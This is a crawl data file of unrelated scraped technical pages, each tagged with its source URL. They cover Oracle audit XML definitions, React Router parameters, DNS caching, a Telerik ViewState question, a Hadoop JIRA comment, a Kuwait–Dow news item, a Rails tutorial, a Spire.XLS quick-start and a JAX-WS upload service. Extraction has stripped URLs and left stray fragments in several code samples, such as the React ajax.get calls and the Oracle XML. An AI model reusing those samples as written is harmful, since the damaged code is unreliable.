and 'deposit': <Category displayName="Transaction" name="Transaction"> <Attributes> <Attribute name="AccountNumber" ns="accounting" version="1.0"/> <Attribute name="Date" ns="accounting" version="1.0" /> <Attribute name="Amount" ns="accounting" version="1.0" /> </Attributes> <Event displayName="purchase" name="purchase"/> <Event displayName="deposit" name="deposit"> <HelpText>depositing funds.</HelpText> </Event> …… </Category> You extend system categories by creating category references in your application audit definitions. List the system events that the system category includes, and add new attribute references and events to it. In this example, a new category references a system category ServiceManagement with a new attribute reference ServiceTime, and a new event restartService: <CategoryRef name="ServiceManagement" componentType="SystemComponent"> <Attributes> <Attribute name="ServiceTime" ns="accounting" version="1.0" /> </Attributes> <EventRef name="startService"/> <EventRef name="stopService"/> <Event displayName="restartService" name="restartService"> <HelpText>restart service</HelpText> </Event> </CategoryRef> There are two types of definition files: component_events.xml definition file translation files The component_events.xml file specifies the properties the audit service needs to log audit events, including: basic properties - and the major and minor version the component type, which is the property that applications use to register with the audit service and obtain runtime auditor instances Major and minor version of the application. at most one custom attribute group event categories with attribute references and events component level filter definitions runtime policies, which include: filterPreset - specifies the audit filter level specialUsers - specifies the users to always audit maxBusstopDirSize maxBusstopFileSize For details about run-time policies, see Section 13.3. Here is an example component_events.xml file: <?xml version="1.0"?> <AuditConfig xmlns=""> <AuditComponent componentType="ApplicationAudit" major="1" minor="0"> <Attributes ns="accounting" version="1.0"> <Attribute name="TransactionType" displayName="Transaction Type" type="string" order="1"> "> <HelpText>Account status.</HelpText> </Attribute> </Attributes> <Events> <Category displayName="Transaction" name="Transaction"> <Attributes> <Attribute name="AccountNumber" ns="accounting" version="1.0" /> <Attribute name="Date" ns="accounting" version="1.0" /> <Attribute name="Amount" ns="accounting" version="1.0" /> </Attributes> <Event displayName="purchase" name="purchase"> <HelpText>direct purchase.</HelpText> </Event> <Event displayName="deposit" name="deposit"> <HelpText>depositing funds.</HelpText> </Event> <Event displayName="withdrawing" name="withdrawing"> <HelpText>withdrawing funds.</HelpText> </Event> <Event displayName="payment" name="payment"> <HelpText>paying bills.</HelpText> </Event> </Category> <Category displayName="Account" name="Account"> <Attributes> <Attribute name="AccountNumber" ns="accounting" version="1.0" /> <Attribute name="Status" ns="accounting" version="1.0" /> </Attributes> <Event displayName="open" name="open"> <HelpText>Open a new account.</HelpText> </Event> <Event displayName="close" name="close"> <HelpText>Close an account.</HelpText> </Event> <Event displayName="suspend" name="suspend"> <HelpText>Suspend an account.</HelpText> </Event> </Category> </Events> <FilterPresetDefinitions> <FilterPresetDefinition displayName="Low" helpText="" name="Low"> <FilterCategory enabled="partial" name="Transaction">deposit.SUCCESSESONLY(HostId -eq "NorthEast"),withdrawing</FilterCategory> <FilterCategory enabled="partial" name="Account">open.SUCCESSESONLY,close.FAILURESONLY</FilterCategory> </FilterPresetDefinition> <FilterPresetDefinition displayName="Medium" helpText="" name="Medium"> <FilterCategory enabled="partial" name="Transaction">deposit,withdrawing</FilterCategory> <FilterCategory enabled="partial" name="Account">open,close</FilterCategory> </FilterPresetDefinition> <FilterPresetDefinition displayName="High" helpText="" name="High"> <FilterCategory enabled="partial" name="Transaction">deposit,withdrawing,payment</FilterCategory> <FilterCategory enabled="true" name="Account"/> </FilterPresetDefinition> </FilterPresetDefinitions> <Policy filterPreset="Low"> <CustomFilters> <FilterCategory enabled="partial" name="Transaction">purchase</FilterCategory> </CustomFilters> </Policy> </AuditComponent> </AuditConfig> Translation files are used to display audit definition in different languages. The registration service uses certain rules to create the audit metadata for the application. This metadata is used to maintain different versions of the audit definition, and to load audit data and generate reports. Each audit definition must have a major and a minor version number, which are integers, for example, major = 1 minor=3. Any change to an audit event definition requires that the version ID be modified by changing the minor and/or major number. Version numbers are used by the audit registration service to determine the compatibility of event definitions and attribute mappings between versions. Note: These version numbers have no relation to Oracle Fusion Middleware version numbers. Versioning for Oracle Components When registering an Oracle component such as Oracle Virtual Directory, the audit registration service checks if this is a first-time registration or an upgrade. For a new registration, the service: retrieves the component audit and translation information. parses and validates the definition, and stores it in the audit metadata store. generates the attribute-column mapping table, and saves this in the audit metadata store. For upgrades, the current major and minor numbers for the component in the metadata store are compared to the new major and minor numbers to determine whether to proceed with the upgrade. Versioning for JavaEE Applications When modifying your application's audit definition, it is recommended that you set the major and minor numbers as follows: Only increase the minor version number when making version-compatible changes, meaning changes in an audit definition such that the attribute database mapping table generated from the new audit definition should still work with the audit data created by the previous attribute database mapping table. For example, suppose the current definition version is major=2 and minor=1. When adding a new event that does not affect the attribute database mapping table, you can change the minor version to 2 (minor=2), while the major version remains unchanged (major=2). Increase major version number when making version changes where the new mapping table is incompatible with the previous table. When registering a new component or application, the registration service creates an attribute-to-database column mapping table from the component's custom attributes, and then saves this table to the audit metadata store. Attribute-database mapping tables are required to ensure unique mappings between your application's attribute definitions and database columns. The audit loader uses mapping tables to load data into the audit store; the tables are also used to generate audit reports from custom database table IAU_CUSTOM. Viewing Audit Definitions for your Component You can use the OPSS script command createAuditDBView to create a database view of the audit definitions of your component. For details about command syntax, see Section C.4.9. Using the createAuditDBView command requires an understanding of how your component's attributes are mapped to database columns; see the discussion below for details. Understanding the Mapping Table for your Component A custom attribute-database column mapping has properties of attribute name, database column name, and data type. Each custom attribute must have a mapping order number in its definition. Attributes with the same data type are mapped to the database column in the sequence of attribute mapping order. For example, if the definition file looks like this: <Attributes ns="accounting" version="1.1"> <Attribute name="TransactionType" type="string" maxLength="0" displayName="Transaction Type" order="1"/> <Attribute name="AccountNumber" type="int" displayName="Account Number" order="2"> <Attribute name="Date" type="dateTime" displayName="Date" order="3"/> <Attribute name="Amount" type="float" displayName="Amount" order="4"/> <Attribute name="Status" type="string" maxLength="0" displayName="Account Status" order="5"/> <Attribute name="Balance" type="float" displayName="Account Balance" order="6"/> </Attributes> then the mapping is as follows: <AttributesMapping ns="accounting" tableName="IAU_CUSTOM" version="1.1"> <AttributeColumn attribute="TransactionType" column="IAU_STRING_001" datatype="string"/> <AttributeColumn attribute="AccountNumber" column="IAU_INT_001" datatype="int"/> <AttributeColumn attribute="Date" column="IAU_DATETIME_001" datatype="dateTime"/> <AttributeColumn attribute="Amount" column="IAU_FLOAT_001" datatype="float"/> <AttributeColumn attribute="Status" column="IAU_STRING_002" datatype="string"/> <AttributeColumn attribute="Balance" column="IAU_FLOAT_002" datatype="float"/> </AttributesMapping> The version ID of the attribute-database column mapping table matches the version ID of the custom attribute group. This allows your application to maintain the backward compatibility of attribute mappings across audit definition versions. For more information about versioning, see Section 12.5.3.1.
http://docs.oracle.com/cd/E28280_01/core.1111/e10043/audintro.htm
CC-MAIN-2017-22
en
refinedweb
So far we've been working with the React repository on GitHub, but now it's time we started using different repositories as well. Specifically, we want users to be able to choose between React, React Native and Jest in the List component, then load the correct Detail component for each of those. We currently have these two routes defined in index.js: src/index.js <Route path="/" component={ List } /> <Route path="/react" component={ Detail } /> You might very well think we just need to extend that like so: <Route path="/" component={ List } /> <Route path="/react" component={ Detail } /> <Route path="/react-native" component={ Detail } /> <Route path="/jest" component={ Detail } /> That's certainly a possibility, but it's neither flexible or scalable. Wouldn't it be much better if we could write any link like /detail/??? and have our Detail component figure out what that means? Sure it would. And fortunately React Router makes it easy – in fact it's just a matter of rewriting your routes to this: src/index.js <Route path="/" component={ List } /> <Route path="/detail/:repo" component={ Detail } /> Yes, that's it. Just by writing :repo in the URL, React Router will automatically pull out whatever text comes in that part of the URL, then pass it to the Detail component to act on. Sure, we still need to actually do something with the repository name, but it means the Detail component will now work for /detail/react, /detail/react-native and so on. Given how easy that step was, you're probably imagining there's lots of work to do in the Detail component. Well, you'd be wrong: we have to change just one part of one line in order to make it work. Isn't React Router clever? In Detail.js look for this line inside the fetchFeed() method: src/pages/Detail.js ajax.get(`{type}`) If you remember, that uses ES6 string interpolation so that the URL gets written as .../react/commits, .../react/pulls, etc. Thanks to the magic of React Router, we can use the exact same technique with the name of the repository too. We used :repo inside our route, and React Router will automatically make that available to the Detail component as this.props.params.repo. So, replace that existing ajax.get() call with this: src/pages/Detail.js const baseURL = ''; ajax.get(`${baseURL}/${this.props.params.repo}/${type}`) That now does a triple interpolation: once for the :repo part of our URL, and again for the view mode that's currently selected, i.e. commits, forks and pulls. I added a third one for baseURL to avoid the line getting too long to read easily. The final step is to modify List.js so that it points to more than one repository. Update its render() method to this: src/pages/List.js render() { return ( <div> <p>Please choose a repository from the list below.</p> <ul> <li><Link to="/detail/react">React</Link></li> <li><Link to="/detail/react-native">React Native</Link></li> <li><Link to="/detail/jest">Jest</Link></li> </ul> </div> ); } Now save all your work, and go to in your browser. You should see three links to choose from, each showing different GitHub repositories. You should also be able to use your browser's back button to return to the list and choose a different repository.!
http://www.hackingwithreact.com/read/1/24/making-custom-urls-with-react-router-params
CC-MAIN-2017-22
en
refinedweb
We're going to make a small change to the way our routes list is stored, then it's time for you to take on another task. First things first: we're storing our list of routes inside index.js, which is fine when you're just getting started but sooner or later needs to be put somewhere else to make your app easier to maintain. Well, that time is now, so create a new file called routes.js in your src directory where index.js is. We're going to move most of the routing code out from index.js and in to routes.js so that we have a clear separation of concerns. This also means splitting up the import lines: routes.js needs to know all our app's imports, whereas index.js doesn't. Here's the new code for routes.js src/routes.js import React from 'react'; import { Route, IndexRoute } from 'react-router'; import App from './pages/App'; import List from './pages/List'; import Detail from './pages/Detail'; const routes = ( <Route path="/" component={ App }> <IndexRoute component={ List } /> <Route path="detail/:repo" component={ Detail } /> </Route> ); export default routes; That imports only what it needs, then creates a constant containing the route configuration for our app, and exports that constant so that others can use it. What remains in index.js is the basic router configuration and the main call to ReactDOM.render(). Over time, as your application grows, you'll probably add more to this file, but trust me on this: you'll definitely fare better if you keep your route configuration out of your main index.js file. Here's the new code for index.js: src/index.js import React from 'react'; import ReactDOM from 'react-dom'; import { Router, useRouterHistory } from 'react-router'; import { createHashHistory } from 'history'; import routes from './routes'; const appHistory = useRouterHistory(createHashHistory)({ queryKey: false }) ReactDOM.render( <Router history={appHistory} onUpdate={() => window.scrollTo(0, 0)}> {routes} </Router>, document.getElementById('app') ); With that little clean up complete it's time for your first major!
http://www.hackingwithreact.com/read/1/26/cleaning-up-our-routes-and-preparing-for-the-next-step
CC-MAIN-2017-22
en
refinedweb
The whole resolution process may seem awfully convoluted and cumbersome to someone accustomed to simple searches through the host table. Actually, though, it's usually quite fast. One of the features that speeds it up considerably is caching. A name server processing a recursive query may have to send out quite a few queries to find an answer. However, it discovers a lot of information about the domain namespace as it does so. Each time it's referred to another list of name servers, it learns that those name servers are authoritative for some zone, and it learns the addresses of those servers. At the end of the resolution process, when it finally finds the data the original querier sought, it can store that data for future reference, too. The Microsoft DNS Server even implements negative caching: if a name server responds to a query with an answer that says the domain name or data type in the query doesn't exist, the local name server will also temporarily cache that information. Name servers cache all this data to help speed up successive queries. The next time a resolver queries the name server for data about a domain name the name server knows something about, the process is shortened quite a bit. The name server may have cached the answer, positive or negative, in which case it simply returns the answer to the resolver. Even if it doesn't have the answer cached, it may have learned the identities of the name servers that are authoritative for the zone the domain name is in and be able to query them directly. For example, say our name server has already looked up the address of eecs.berkeley.edu. In the process, it cached the names and addresses of the eecs.berkeley.edu and berkeley.edu name servers (plus eecs.berkeley.edu's IP address). Now if a resolver were to query our name server for the address of baobab.cs.berkeley.edu, our name server could skip querying the root name servers. Recognizing that berkeley.edu is the closest ancestor of baobab.cs.berkeley.edu that it knows about, our name server would start by querying a berkeley.edu name server, as shown in Figure 2-16. On the other hand, if our name server discovered that there was no address for eecs.berkeley.edu, the next time it received a query for the address, it could simply respond appropriately from its cache. In addition to speeding up resolution, caching obviates a name server's need to query the root name servers to answer any queries it can't answer locally. This means it's not as dependent on the roots, and the roots won't suffer as much from all its queries. Name servers can't cache data forever, of course. If they did, changes to that data on the authoritative name servers would never reach the rest of the network; remote name servers would just continue to use cached data. Consequently, the administrator of the zone that contains the data decides on a time to live (TTL) for the data. The time to live is the amount of time that any name server is allowed to cache the data. After the time to live expires, the name server must discard the cached data and get new data from the authoritative name servers. This also applies to negatively cached data: a name server must time out a negative answer after a period in case new data has been added on the authoritative name servers. Deciding on a time to live for your data is essentially deciding on a trade-off between performance and consistency. A small TTL will help ensure that data in your zones is consistent across the network, because remote name servers will time it out more quickly and be forced to query your authoritative name servers more often for new data. On the other hand, this will increase the load on your name servers and lengthen the average resolution time for information in your zones. A large TTL reduces the average time it takes to resolve information in your zones because the data can be cached longer. The drawback is that your information will be inconsistent longer if you make changes to the data on your name servers. But enough of this theory?I'll bet you're antsy to get on with things. You have some homework to do before you can set up your zones and your name servers, though, and we'll assign it in the next chapter.
http://etutorials.org/Server+Administration/dns+windows+server/Chapter+2.+How+Does+DNS+Work/2.7+Caching/
CC-MAIN-2017-22
en
refinedweb
1. Drag any plugin on grid. 2. On 'createClass' config type a class that includes the namespace (e.g. MyApp.CustomGridPlugin) 3. It throws and error saying 'createClass: property must begin with...' 1. Drag any plugin on grid. 2. On 'createClass' config type a class that includes the namespace (e.g. MyApp.CustomGridPlugin) 3. It throws and error saying 'createClass: property must begin with...' We are the same issue on the error when using dot (".") in createClass config. Is this a bug? Hello.. That was our first option but if we build the modules individually we would get redundant classes. I'm not sure how it affects our application but that would definitely add bytes.... Currently, we are creating project that has 50 modules. We are loading each modules when the login form shows in the background using Ext.require to make our application responsive or in order to... Is there a possible workaround for this? REQUIRED INFORMATION Ext version tested: Ext 4.2.1 Browser versions tested against: Any Description: yes i did. for more information about my problem please see this post Is there an event that i could use to identify that all elements have been rendered on the dom? I want to render my viewport after the other elements to make sure that it would layout correctly and... I've inspected the DOM and found out that you're right. :( Even your documentation has an issue to that. Why it was behaving correctly on firefox? Can we have a workaround? :) Hello I've created a custom plugin which extends from AbstractPlugin but it seems it is not initializing. Here's some info about the plugin. - It was created in architect. - The plugin was based... Hi Aaron Conran I would like to know there is an update how we can add custom column in the grid. My suggestion is to allow the xtype can be change by putting the xtype property in the object... Hi the code below didnt work. I wonder why it didnt trigger the metachange? Can someone help me what is my mistake readRecords: function(datastr) { var data = {}; ... Hi When I use this kind of Code the Code will work correctly Ext.define('Ext.ux.data.reader.DynamicReader', { extend: 'Ext.data.reader.Json', alias: 'reader.dynamicReader', ...
https://www.sencha.com/forum/search.php?s=4b95cc6a2cf747e2792b247f36fbe7d0&searchid=19245587
CC-MAIN-2017-22
en
refinedweb
view raw I am using matplotlib to make scatter plots. Each point on the scatter plot is associated with a named object. I would like to be able to see the name of an object when I hover my cursor over the point on the scatter plot associated with that object. In particular, it would be nice to be able to quickly see the names of the points that are outliers. The closest thing I have been able to find while searching here is the annotate command, but that appears to create a fixed label on the plot. Unfortunately, with the number of points that I have, the scatter plot would be unreadable if I labeled each point. Does anyone know of a way to create labels that only appear when the cursor hovers in the vicinity of that point? From : from matplotlib.pyplot import figure, show import numpy as npy from numpy.random import rand) show()
https://codedump.io/share/nSiVG61nLRG8/1/possible-to-make-labels-appear-when-hovering-over-a-point-in-matplotlib
CC-MAIN-2017-22
en
refinedweb
SP_signal() #include <sicstus/sicstus.h> typedef void SP_SigFun (int sig, void *user_data); SP_SigFun SP_signal(int sig, SP_SigFun fun, void *user_data); Installs a function fun as a handler for the signal sig. It will be called with sig and user_data as arguments. The signal The function An extra, user defined value passed to the function. SP_SIG_ERR if an error occurs error. On success, some value different from SP_SIG_ERR.. may only call other (non SICStus) C code and SP_event(). Note that func will be called in the main thread. If fun is one of the special constants SP_SIG_IGN or SP_SIG_DFL, then one of two things happens: sighas already been installed with SP_signal(), then the SICStus OS-level signal handler is removed and replaced with, respectively, SIG_IGNor SIG_DFL.). Note that SP_signal() is not suitable for installing signal handlers for synchronous signals like SIGSEGV. SP_event(), Signal Handling.
https://sicstus.sics.se/sicstus/docs/latest/html/sicstus.html/cpg_002dref_002dSP_005fsignal.html
CC-MAIN-2017-22
en
refinedweb
Posted 25 Mar 2009 Link to this post Ok, I know the subject doesn't make sense, but I am at the point of ripping my hair out over this. I have a struct which contains other structs (also tag serializable) shown below. I am heavily using Telerik controls in this app and as the user follows this tab driven wizard, information from each tab is added to the TestConfig object in ViewState. This works flawlessly, until... you let the browser sit for 4 or so minutes. If at any point in time you sit on a particular tab and wait the requsite 240+ seconds, when the user clicks next, the debugger throws an InvalidCastException. Here is the interesting part. The cast is a simple return of the object from ViewState (below). The object in ViewState no longer thinks it is a TestConfig object. It will allow me to cast it as an object as it rightfully should and I can even drill down into the object within VS2008 and see all of the data is still there. Somehow it is losing its type and I cannot for the life of me figure it out. I am at the point of either moving to a database solution or if it doesn't make sense to do that, hidden controls, but I would really like to just resolve this the right way. Anyone have any thoughts? Structs: [Serializable] public struct TestConfig { public GridData oTestType; public GridData oArchitecture; public GridData oBuild; public GridData oBuildType; public List<GridData> gloLanguages; public List<GridData> gloOperatingSystems; public List<GridData> gloFamilies; public List<TestDriverData> gloTestDriverData; } [Serializable] public struct TestDriverData { public string sPath; public string sModel; public string sModelDisplayString; public string sPort; public string sPdl; public string sPdlDisplayString; public string sFamily; } [Serializable] public struct GridData { public string sDisplay; public string sData; public string sMisc; } Return Code: return (TestConfig)ViewState["m_TestConfig"]; return (TestConfig)ViewState["m_TestConfig"]; Posted 26 Mar 2009 Link to this post
http://www.telerik.com/forums/odd-viewstate-timeout-issue
CC-MAIN-2017-22
en
refinedweb
This article is part 2 in a series that discusses namespace planning, load balancing principles, client connectivity, and certificate planning. Unlike previous versions of Exchange, Exchange 2013 no longer requires session affinity at the load balancing layer. To understand this statement better, and see how this impacts your designs, we need to look at how CAS2013 functions. From a protocol perspective, the following will happen: Step 5 is the fundamental change that enables the removal of session affinity at the load balancer. For a given protocol session, CAS now maintains a 1:1 relationship with the Mailbox server hosting the user’s data. In the event that the active database copy is moved to a different Mailbox server, CAS closes the sessions to the previous server and establishes sessions to the new server. This means that all sessions, regardless of their origination point (i.e., CAS members in the load balanced array), end up at the same place, the Mailbox server hosting the active database copy.This is vastly different from previous releases – in Exchange 2010, if all requests from a specific client did not go to the same endpoint, the user experience was negatively affected. The protocol used in step 6 depends on the protocol used to connect to CAS. If the client leverages the HTTP protocol, then the protocol used between the Client Access server and Mailbox server is HTTP (secured via SSL using a self-signed certificate). If the protocol leveraged by the client is IMAP or POP, then the protocol used between the Client Access server and Mailbox server is IMAP or POP. Telephony requests are unique, however. Instead of proxying the request at step 6, CAS will redirect the request to the Mailbox server hosting the active copy of the user’s database, as the telephony devices support redirection and need to establish their SIP and RTP sessions directly with the Unified Messaging components on the Mailbox server. Read Server 2010 Disaster Recovery
http://blogs.technet.com/b/omers/archive/2014/03/06/load-balancing-in-exchange-2013.aspx
CC-MAIN-2015-06
en
refinedweb
iPcCommandInput Struct ReferenceInput propery class. More... #include <propclass/input.h>. - RemoveBind: paramaters 'trigger' (string) and 'command' (string). - RemoveAllBinds. - LoadConfig: parameters 'prefix' (string). - SaveConfig: parameters 'prefix' (string). This property class can send out the following messages to the behaviour: - (-1/1 is default). - cooked (bool, read/write): use cooked mode instead of raw (default is raw. - sendtrigger (bool, read/write): send out trigger name in the message to the behaviour. Default is false. Definition at line 59 of file input.h. Member Function Documentation Activates the input to get Commands. Binds a trigger to a command. The triggername can be equal to 'key' in which case all keys will be bound. Convert a coordinate from a value between -1 and 1 to screen-space. - Parameters: - returns the command bind to a key Get cooked or raw. Is send trigger enabled or disabled? Loads from a config file binding triggers(for example keys) to commands. - Parameters: - deletes all binds deletes a bind, if triggername is 0 deletes all binds to the command by doxygen 1.4.7
http://crystalspace3d.org/cel/docs/online/api-1.0/structiPcCommandInput.html
CC-MAIN-2015-06
en
refinedweb
[ ] Konstantin Shvachko commented on HADOOP-5795: --------------------------------------------- Currently {{getBlockLocations(src, offset, length)}} returns a class called {{LocatedBlocks}}, which contains a list of {{LocatedBlock}} belonging to the file. {code} public class LocatedBlocks implements Writable { private long fileLength; private List<LocatedBlock> blocks; // array of blocks with prioritized locations } {code} The question is whether we should modify {{LocatedBlocks}}, which would include the map proposed by Doug and extend the semantics of {{getBlockLocations()}} to handle directories, or should we introduce a new method (rpc) {{getBlockLocations(srcDir)}} returning {{LocatedBlockMap}}. Is there a reason to keep current per file {{getBlockLocations()}} if we had a more generic method? > Add a bulk FIleSystem.getFileBlockLocations > ------------------------------------------- > > Key: HADOOP-5795 > URL: > Project: Hadoop Core > Issue Type: New Feature > Components: dfs > Affects Versions: 0.20.0 > Reporter: Arun C Murthy > Fix For: 0.21.0 > > >.
http://mail-archives.apache.org/mod_mbox/hadoop-common-dev/200905.mbox/%3C2141423149.1241806545682.JavaMail.jira@brutus%3E
CC-MAIN-2015-06
en
refinedweb
27 January 2009 22:21 [Source: ICIS news] TORONTO (ICIS news)--Kuwait’s parliament voted on Tuesday to set up a panel to investigate the K-Dow petrochemicals joint-venture deal between Dow Chemical and the country’s Petrochemicals Industries Co (PIC) that was later cancelled, regional media reported on Tuesday. The panel would investigate allegations of profiteering and other irregularities by officials involved in the deal, Kuwait's Al Watan newspaper and other media reported. Under the deal, Dow would have received $7.5bn from PIC. Kuwait cancelled the deal in late December, citing unfavourable economic conditions and the global financial crisis. A media official at Dow’s headquarter in ?xml:namespace> Dow chief executive Andrew Liveris, in an interview with He confirmed that Dow had taken legal steps against Liveris also said that, should the deal with PIC close after all or if another partner came forward, Dow for its part would be able close its acquisition of In the current tough financial market environment, however, it would be “an economic disaster” for both companies to put Dow Chemical and Rohm and Haas together, Liveris said. He expressed his hope that the deal may be concluded at a later but unspecified date. Rohm and Haas said on Monday it had taken legal action against Dow for failing to close the deal.
http://www.icis.com/Articles/2009/01/27/9188128/kuwait-parliament-votes-to-probe-dow-pic-deal-reports.html
CC-MAIN-2015-06
en
refinedweb
At the Forge - Ruby on Rails Now that we know how to see the default message, let's move toward a “Hello, world” program. In Rails, there are two basic ways to do this. We can create a controller that returns HTML to the user's browser, or we can create a view that does the same. Let's try it both ways, so that we can better understand the relationship between controllers and views. If all we want to do is include a simple, static HTML document, we can do so in the public directory. In other words, the file blog/public/foo.html is available under WEBrick—started by executing blog/script/server—at the URL /foo.html. Of course, we're interested in doing something a bit more interesting than serving static HTML documents. We can do that by creating a controller class and then defining a method within that class to produce a basic “Hello, world” message. Admittedly, this is a violation of the MVC separation that Rails tries to enforce, but as a simple indication of how things work, it seems like a good next step. To generate a new controller class named MyBlog, we enter the blog directory and type: ruby script/generate controller MyBlog Each time we want to create a new component in our Rails application, we call upon script/generate to create a skeleton. We then can modify that skeleton to suit our specific needs. As always, Rails tells us what it is doing as it creates the files and directories: exists app/controllers/ exists app/helpers/ create app/views/my_blog exists test/functional/ create app/controllers/my_blog_controller.rb create test/functional/my_blog_controller_test.rb create app/helpers/my_blog_helper.rb Also notice how our controller class name, MyBlog, has been turned into various Ruby filenames, such as app/views/my_blog and app/helpers/my_blog_helper.rb. Create several more controller classes, and you should see that all of the names, like FooBar, are implemented in files with names like foo_bar. This is part of the Rails convention of keeping names consistent. This consistency makes it possible for Rails to take care of many items almost magically, especially—as we will see next month—when it comes to databases. The controller that interests us is my_blog_controller.rb. If you open it up in an editor, you should see that it consists of two lines: class MyBlogController < ApplicationController end In other words, this file defines MyBlogController, a class that inherits from the ApplicationController class. As it stands, the definition is empty, which means that we have neither overridden any methods from the parent class nor written any new methods of our own. Let's change that, using the built-in render_text method to produce some output: class MyBlogController < ApplicationController def hello_world render_text "Hello, world" end end After adding this method definition, we can see its results by going to. Notice how the URL has changed: static items in the public directory, such as our file foo.html, sit just beneath the root URL, /. By contrast, our method hello_world is accessed by name, under the controller class that we generated. Also notice that we did not need to restart Rails in order to create and test this definition. As soon as a method is created or changed, it immediately is noticed and integrated into the current Rails system. If we define an index method for our controller class, we can indicate what should be displayed by default: class MyBlogController < ApplicationController def hello_world render_text "Hello, world" end def index render_text "I am the index!" end end Of course, it's not that exciting to be able to product static text. Therefore, let's modify our index method such that it uses Ruby's built-in Time object to show the current date and time: def index render_text "The time is now " + Time.now.to_s + "\n" end And voil� As soon as we save this modification to disk, the default URL (, on my computer) displays the time and date at which the request was made, as opposed to a never-changing “Hello, world” message. Let's conclude this introduction to Rails by separating the controller from its view once again. In other words, we want to have the controller handle the logic and the view handle the HTML output. Once again, Rails allows us to do this easily by taking advantage of its naming conventions. For example, let us modify our index method again, this time removing its entire body: def index end This might seem strange at first glance. It tells Rails that the MyBlog controller class has an index method. But it doesn't generate any output. If you attempt to retrieve the same URL as before, Rails produces an error message indicating that it could not find an appropriate template. Because the template is a view, we can define it inside of the blog/app/views directory of our application. And because we are defining the index view for the MyBlog class, we modify the index.rhtml file in the my_blog subdirectory of views. Notice how Rails turns ThisName into this_name when it comes to directories. Doing so saves users from having to think about capitalization in URLs, while staying consistent with traditional Ruby class naming conventions. .rhtml files are a Ruby version of the same kind of template that you might have seen before. It acts similarly to ASP and JSP syntax, with <% %> blocks containing code and <%= %> blocks containing expressions that should be interpolated into the template. However, nothing stops us from creating an .rhtml template that actually is static: <html> <head> <title> Hello, again! </title> </head> <body> <p>Hello, again!</p> </body> </html> Consider what happens now if you attempt to load MyBlog in your browser. The controller class MyBlog is handed the request. Because no method was named explicitly, the index method is invoked. And because index doesn't produce any output, the my_blog/index.rhtml template is returned to the user. Finally, let's take advantage of our template's dynamic properties to set a value in the controller and pass that along to the template. We modify our index method to read: def index @now = Time.now.to_s end Notice how we have used an @ character at the beginning of the variable @now. I found this to be a little confusing at first, as @ normally is used as a prefix for instance variables in Ruby. But it soon becomes fairly natural and logical after some time. Finally, we modify our template such that it incorporates the string value contained in @now: <html> <head> <title> Hello, world! </title> </head> <body> <p>Hello, world!</p> <p>It is now <%= @now %>.</p> </body> </html> Once again, you can retrieve the page even without restarting Ruby. You should see the date and time as kept on the server, updated each time you refresh the!
http://www.linuxjournal.com/article/8433?page=0,1&quicktabs_1=2
CC-MAIN-2015-06
en
refinedweb
In this document, we will quickly help you finish a simple demo about Spire.XLS using Visual Studio. As usual, it’s a HelloWorld demo. Before you get started, please make sure the Spire.XLS and Visual Studio (2008 or later) are installed on your computer. 1. In Visual Studio, click File, New, and then Project, If you want to create a C# project, select Visual C#, Windows and choose Windows Forms Application and name the project HelloWorld. Click OK. If you want to create a Visual Basic project, select Visual Basic, Windows Forms Application and name the project HelloWorld. Click OK. 2. In Solution Explorer, right-click the project HelloWorld and click Add Reference. In the Browse tab, find the folder in which you installed the Spire.XLS, default is "C:\Program Files\e-iceblue\Spire.XLS", double-click the folder Bin. If the target framework of the project HelloWorld - is .NET 2.0, double-click folder NET2.0 - is .NET 3.5, double-click folder NET3.5 - is .NET 4.0, double-click folder NET4.0 select assembly Spire.XLS.dll and click OK to add it to the project. 3. In Solution Explorer, double-click the file Form1.cs/Form1.vb to open the form design view, add a button into the form, and change its name to 'btnRun', change its text to 'Run'. 4. Double-click the button 'Run', you will see the code view and the following method has been added automatically: private void btnRun_Click(object sender, EventArgs e) Private Sub btnRun_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnRun.Click 5. Add the following codes to the top of the file using Spire.Xls; Imports Spire.Xls 6. Add the following codes to the method btnRun_Click //Creates workbook Workbook workbook = new Workbook(); //Gets first worksheet Worksheet sheet = workbook.Worksheets[0]; //Writes hello world to A1 sheet.Range["A1"].Text = "Hello,World!"; //Save workbook to disk workbook.SaveToFile("Sample.xls"); try { System.Diagnostics.Process.Start(workbook.FileName); } catch { } 'Creates workbook Dim workbook As Workbook = New Workbook() 'Gets first worksheet Dim sheet As Worksheet = workbook.Worksheets(0) 'Writes hello world to A1 sheet.Range("A1").Text = "Hello,World!" 'Save workbook to disk workbook.SaveToFile("Sample.xls") Try System.Diagnostics.Process.Start(workbook.FileName) Catch End Try 7. In Solution Explorer, right-click the project HelloWorld and click Debug, then Start new instance, you will see the opened window Form1, click the button 'Run', an Excel document will be created, edited and opened. The string "Hello, World" is filled in the cell A1.
http://www.e-iceblue.com/Knowledgebase/Spire.XLS/Getting-started/Spire.XLS-Quick-Start.html
CC-MAIN-2015-06
en
refinedweb
: The above problem can be solved using Web service. Functionalities which are to be used by various applications will be now exposed as Web service. Since web service is based on the principle of separation between interface and implementation, the implementation part of Web service will make use of core Ex API to achieve the required functionality. Since web service provides transparency w.r.t. programming language, applications written in various programming language can access the web service without any hindrance. Hence using web service serves as the best solution in this scenario. JAX WS package com.questpond.service; import javax.jws.WebMethod; import javax.jws.WebService; import javax.jws.soap.SOAPBinding; import javax.jws.soap.SOAPBinding.Style; @WebService @SOAPBinding(style = Style.RPC) public interface DocumentInt { @WebMethod public String upload(byte data[]) ; } Step 3: Create a DocumentImpl class implementing DocumentInt and give body to upload. The function takes byte array and converts the same to a file at location "D:/eclipse/Example.pdf". MTOM is used to support optimization while transmitting binary data. DocumentImpl package com.questpond.service; import java.io.File; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOException; import java.io.OutputStream; import javax.jws.WebService; import javax.xml.ws.soap.MTOM; @MTOM @WebService(endpointInterface = "com.questpond.service.DocumentInt") public class DocumentImpl implements DocumentInt { @Override public String upload(byte data[]) { OutputStream fos; try { fos = new FileOutputStream(new File("D://eclipse//Example.pdf")); fos.write(data); fos.flush(); fos.close(); } catch (FileNotFoundException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } return "success"; } } Step 4: Create DocumentPublisher class which will publish the created web service. Put the following code inside the same: DocumentPublisher package com.questpond.service; import javax.xml.ws.Endpoint; public class DocumentPublisher { public static void main(String[] args) { Endpoint.publish("", new DocumentImpl()); System.out.println("Server is published!"); } } Step 5: Execute the publisher class so that web service is exposed. Confirm the same by putting the following URL in Web browser to get the exposed WSDL file. A snippet of the same is shown: Step 6: Create a client for web service. Let’s name the class as Main. Main The Main class will be responsible to invoke the web service and since the parameter to the upload function is a byte array which contains file data, the client will convert file to a byte array and will pass the same to upload function which will convert the byte array to file. Put the following code with main function of 